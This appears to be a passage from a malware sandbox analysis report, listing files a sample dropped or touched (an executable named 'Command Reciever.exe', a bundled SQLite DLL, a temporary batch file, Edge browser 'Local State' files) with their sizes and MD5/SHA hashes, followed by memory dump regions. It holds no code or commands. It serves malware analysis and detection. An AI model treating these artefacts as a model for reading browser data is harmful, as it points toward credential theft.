add49e83518743046a2d27754a3296f1bac84b13ebe49d83239d6720f285bed3

SHA512
7252e8ae4bdc1276635d0f7f1451ae4a18020bec3e366242ad28665d976c31c711805c80f7a1dcc5fe77486d9003975b22a64ff0c6b2e732a7ba77e05a0847e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a9573ba66b069f2562ff5c7604eddf10

SHA1
1de2aa0fd18ab2f0fe723b0a89e9d770a807e875

SHA256
82a2133a0e0d3a59b18b65f079b45bcbd8c7e1fddf7edff12c7e5c095c7f2a5d

SHA512
bb7fca4663fe2d9a8fa3f28df2f286dbee080d5ca1bc62662c498d139025a2defaf71b89fa3823a18d67c5a5b6c5cdcac3477592bc92b848dbb31adf8c184720

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1ed4f77aa9085bd3c8cfe7c7d128ea37

SHA1
ca62415d771af057be5cc13a4f4cc2a0123d1acd

SHA256
30f72f2379f0b1dc5061e71b3b05c05cb34ef6dc74e8f095192a9e7b66e4a300

SHA512
20c316f38bdaadfdc25cec760cadf45c503f248d4e2bbbdc28608cd20cc367411fd5ae7e8e65c36f9b4d2338b9ee9662b8256f98afc99df764b46a795647b4a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
577ca6ed952f99039f6807d57d4dea19

SHA1
8e85d2cb290407ffe9ae29c45e5633ac1a17740f

SHA256
ed07949819d7db5c3823f2e1f2ad850445fee319a221f3c71ff2f5a8d642f39b

SHA512
9899ee632a5c8eb1a035e15be47f677968d8e6439f1119dd773a72f9da8e36ce9a38f3d78b52e375d5d23fd711497515bf6f1f22dbbc9215fe00fff78e34185e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

Filesize
5.6MB

MD5
eb01eece5f0887b24a1bd53183d801dc

SHA1
49e92aee8351e3a995d8ec95bc64d7f381dcee28

SHA256
a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c

SHA512
83374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA10A.tmp.bat

Filesize
295B

MD5
e0e117a4b99c4a6a16f627c0d32498f1

SHA1
4298cdf5e072130c4b54e838c40b83c677b1da0f

SHA256
9d830bf3217d4220aefb714e3719d7d5fccd4c15751e956500eb72bfadc3d47c

SHA512
c426d30a9fa5277385e0df10878338e4b7e0f38cee8f18610fd23f8fa78d72de3f6e3f9621b637d20ee23750b46d713d52ee2607ac8709ca4005f2d3cee23493

Download Submit
memory/1544-331-0x0000027E50500000-0x0000027E5056A000-memory.dmp

Filesize
424KB

Download
memory/1544-361-0x0000027E50650000-0x0000027E50662000-memory.dmp

Filesize
72KB

Download
memory/1544-339-0x0000027E51490000-0x0000027E517BE000-memory.dmp

Filesize
3.2MB

Download
memory/1544-338-0x0000027E4FFF0000-0x0000027E50016000-memory.dmp

Filesize
152KB

Download
memory/1544-337-0x0000027E50740000-0x0000027E5077A000-memory.dmp

Filesize
232KB

Download
memory/1544-335-0x0000027E50620000-0x0000027E50642000-memory.dmp

Filesize
136KB

Download
memory/1544-334-0x0000027E50670000-0x0000027E506C0000-memory.dmp

Filesize
320KB

Download
memory/1544-333-0x0000027E50570000-0x0000027E50622000-memory.dmp

Filesize
712KB

Download
memory/2388-294-0x0000000005DC0000-0x0000000006364000-memory.dmp

Filesize
5.6MB

Download
memory/2388-293-0x0000000000CD0000-0x0000000000F12000-memory.dmp

Filesize
2.3MB

Download
memory/3480-320-0x0000019FDA100000-0x0000019FDA10A000-memory.dmp

Filesize
40KB

Download
memory/3480-319-0x0000019FDA0E0000-0x0000019FDA0FE000-memory.dmp

Filesize
120KB

Download
memory/3480-309-0x0000019FD7E30000-0x0000019FD83D2000-memory.dmp

Filesize
5.6MB

Download
memory/3480-316-0x0000019FDA180000-0x0000019FDA1F6000-memory.dmp

Filesize
472KB

Download
memory/4516-308-0x0000000005140000-0x00000000051DC000-memory.dmp

Filesize
624KB

Download
memory/4516-321-0x0000000008EC0000-0x0000000008F26000-memory.dmp

Filesize
408KB

Download
memory/4516-310-0x00000000052B0000-0x0000000005342000-memory.dmp

Filesize
584KB

Download
memory/4516-303-0x00000000002B0000-0x0000000000942000-memory.dmp

Filesize
6.6MB

Download
memory/4516-317-0x0000000005250000-0x000000000525A000-memory.dmp

Filesize
40KB

Download
memory/4516-318-0x00000000054C0000-0x0000000005516000-memory.dmp

Filesize
344KB

Download